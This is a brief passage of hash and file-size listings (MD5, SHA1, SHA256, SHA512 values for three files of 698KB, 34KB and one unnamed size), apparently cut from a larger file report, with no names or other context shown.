  SHA1: 44a3d232670ef1a52f1bcc9ba1581bb039f58ac6
  SHA256: ec5353fc9c0f3107230fe9d21f5841f34670e621c3f58e7f617cec340f1f04d7
  SHA512: 29f93bd3c0a8c8ca2fd930d8b3a28fbcbcbcb1abb4ea437b0b38d035167625260ca6ae70a197f8dd3bd129eb1baeb5361865ce83e37dd8ef9a54fb9f3a482374
- Filesize: 698KB
  MD5: 95943332ae7c3b0e945b87612a3b8d64
  SHA1: 9501259e29412d069223c89c4a8d9816b40faa8b
  SHA256: 0d7e9c66ba0d97fc23dad44913a0034a98af1e08d966ab205ce913be158d5b1f
  SHA512: a7241dd3559402ee48840d5f032688c0fc73a2d2ad13c1146f0f51c8351910f77ccb9bf229262e342a11955ace5af9f6c0932cf03b8b6a22610ad1e6fcabd656
- Filesize: 34KB
  MD5: ac04b6f6fa293c4b55c4c8b49372a9ec
  SHA1: 9dfca519218c3c10203163454f1237916b0655cc
  SHA256: 273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92
  SHA512: b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086